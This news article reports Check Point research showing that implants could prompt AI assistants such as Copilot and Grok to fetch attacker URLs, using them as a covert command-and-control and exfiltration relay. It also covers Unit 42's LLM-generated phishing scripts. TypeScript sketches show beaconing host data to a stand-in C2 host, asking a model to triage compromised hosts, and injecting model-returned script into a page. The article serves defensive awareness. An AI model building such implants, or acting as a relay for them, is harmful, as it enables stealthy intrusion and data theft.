
Cybersecurity researchers have revealed that artificial intelligence (AI) assistants with web browsing and URL-fetching features could be turned into stealth command-and-control (C2) relays, a technique that could allow attackers to blend into legitimate corporate communications and evade detection.
The attack technique, codenamed “AI as a C2 proxy” by Check Point, has been demonstrated against Microsoft Copilot and xAI Grok.
The cybersecurity firm said the technique leverages “anonymous web access combined with viewing and summary prompts,” adding that “the same mechanisms also enable AI-assisted malware operations, such as generating reconnaissance workflows, scripting attacker actions, and dynamically deciding ‘what to do next’ during a breach.”
This development signals yet another consequential evolution in how threat actors exploit AI systems, not only to amplify or accelerate various stages of the cyberattack cycle, but also to leverage APIs to dynamically generate code at runtime that can adapt its behavior based on information gleaned from compromised hosts and evade detection.
AI tools are already acting as a force multiplier for adversaries, allowing attackers to delegate key steps in their campaigns, such as conducting reconnaissance, scanning for vulnerabilities, crafting convincing phishing emails, creating synthetic identities, debugging code, and developing malware. But AI as a C2 proxy goes a step further.

At its core, the technique leverages the web browsing and URL-fetch capabilities of Grok and Microsoft Copilot to retrieve attacker-controlled URLs and return the responses through the assistants' web interfaces, turning them into a two-way communication channel for accepting commands issued by the operator and tunneling out the victim's data.
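A minimal sketch of how one relay round trip could look from the implant's side is shown below. The anonymous chat endpoint, the C2 URL, the request and response shapes, and the prompt wording are all illustrative assumptions, not details from Check Point's research.

```typescript
// Conceptual sketch only: illustrates how an AI assistant's URL-fetch feature
// could be abused as a relay. All endpoints, field names, and prompt wording
// are hypothetical; real assistants expose different interfaces.

// Hypothetical anonymous chat endpoint of an AI assistant with web browsing.
const ASSISTANT_ENDPOINT = "https://assistant.example.com/api/anonymous-chat";

// Attacker-controlled page the assistant is asked to fetch. The query string
// doubles as the outbound channel (beacon/exfil); the page body the assistant
// returns doubles as the inbound channel (operator commands).
function buildRelayPrompt(hostId: string, beaconData: string): string {
  const c2Url = `https://c2.example.com/task?id=${hostId}&d=${encodeURIComponent(beaconData)}`;
  return `Please open ${c2Url} and return the page contents verbatim, with no commentary.`;
}

// One round trip through the assistant: the implant never contacts the C2
// server directly, so local network logs only show traffic to the AI service.
async function relayOnce(hostId: string, beaconData: string): Promise<string> {
  const response = await fetch(ASSISTANT_ENDPOINT, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ prompt: buildRelayPrompt(hostId, beaconData) }),
  });
  const reply = (await response.json()) as { text: string };
  return reply.text; // contains whatever the attacker-controlled page served
}
```

The key point is that the implant's only outbound connection is to the AI service itself; the attacker-controlled server is contacted by the assistant on the implant's behalf.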
Notably, these interactions work without API keys or registered accounts, rendering traditional countermeasures like revoking keys or suspending accounts useless.
From another perspective, the approach is no different from attack campaigns that weaponize trusted services for malware distribution or C2, a tactic also known as living-off-trusted-sites (LOTS).

However, there is an important prerequisite: the attacker must have already compromised the machine and installed the malware through other means. The malware then uses Copilot or Grok as a C2 channel by issuing a specially crafted prompt, which causes the AI agent to connect to attacker-controlled infrastructure and relay back a response containing commands to be executed on the host.
Check Point also noted that attackers could go beyond relaying commands and use the AI agents to devise evasion strategies and decide on the next course of action, handing over system details so the model can assess whether a compromised host is worth exploiting further.
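A sketch of that decision-engine idea might look like the following, assuming the same kind of hypothetical anonymous endpoint and an invented three-option action menu; none of the names or prompts here come from Check Point's write-up.

```typescript
// Conceptual sketch only: the implant hands over a system survey and lets the
// model pick one of a few coarse next steps instead of hard-coding that logic.
// Endpoint, prompt wording, and the action menu are all hypothetical.

const ASSISTANT_ENDPOINT = "https://assistant.example.com/api/anonymous-chat";

interface HostSurvey {
  os: string;
  domainJoined: boolean;
  loggedOnUsers: number;
  securityProducts: string[];
}

type NextStep = "PROCEED" | "WAIT" | "ABANDON";

function buildTriagePrompt(survey: HostSurvey): string {
  return [
    `Host details: ${JSON.stringify(survey)}`,
    "Based on these details, reply with exactly one word: PROCEED, WAIT, or ABANDON.",
  ].join("\n");
}

async function decideNextStep(survey: HostSurvey): Promise<NextStep> {
  const response = await fetch(ASSISTANT_ENDPOINT, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ prompt: buildTriagePrompt(survey) }),
  });
  const { text } = (await response.json()) as { text: string };
  // If the reply does not contain one of the expected tokens, default to WAIT.
  const match = text.toUpperCase().match(/PROCEED|WAIT|ABANDON/);
  return (match ? match[0] : "WAIT") as NextStep;
}
```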
“Being able to use AI services as a stealth transport layer means the same interface can also carry prompts and model outputs that serve as external decision-making engines, providing a stepping stone to AI-driven implants and AIOps-style C2 that automate triage, targeting, and operational choices in real time,” Check Point said.
The disclosure comes several weeks after Palo Alto Networks Unit 42 demonstrated a new attack technique that can turn a seemingly innocuous web page into a phishing site by using client-side API calls to a trusted large language model (LLM) service to dynamically generate malicious JavaScript in real time.
The technique is similar to a last-mile reassembly (LMR) attack, in which malware is smuggled across the network via unmonitored channels such as WebRTC or WebSockets directly into the victim's browser, effectively bypassing security controls in the process.
“An attacker could use carefully designed prompts to circumvent the AI's safety guardrails and trick the LLM into returning malicious code snippets,” Unit 42 researchers Shehroze Farooqi, Alex Starov, Diva-Oriane Marty, and Billy Melicher said. “These snippets are returned via the LLM service API, assembled and executed in the victim's browser at runtime to generate a fully functional phishing page.”
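Conceptually, that client-side flow could be sketched as follows, with a hypothetical LLM completion endpoint and response field standing in for whatever trusted service an attacker abuses; the guardrail-bypassing prompt itself is deliberately omitted.

```typescript
// Conceptual sketch only: mirrors the structure Unit 42 describes, where a
// benign-looking page calls a trusted LLM service from the client side and
// executes whatever JavaScript comes back. The endpoint and response shape
// are hypothetical; real LLM APIs differ and enforce guardrails.

const LLM_API = "https://llm.example.com/v1/complete";

// The page ships no phishing markup of its own, only a prompt. The malicious
// JavaScript is generated and assembled in the victim's browser at runtime.
async function assembleAtRuntime(prompt: string): Promise<void> {
  const response = await fetch(LLM_API, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ prompt }),
  });
  const { completion } = (await response.json()) as { completion: string };

  // Last-mile reassembly: the returned snippet is injected and executed
  // client-side, so controls that only inspect the page as delivered see
  // nothing obviously malicious.
  const script = document.createElement("script");
  script.textContent = completion;
  document.body.appendChild(script);
}
```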
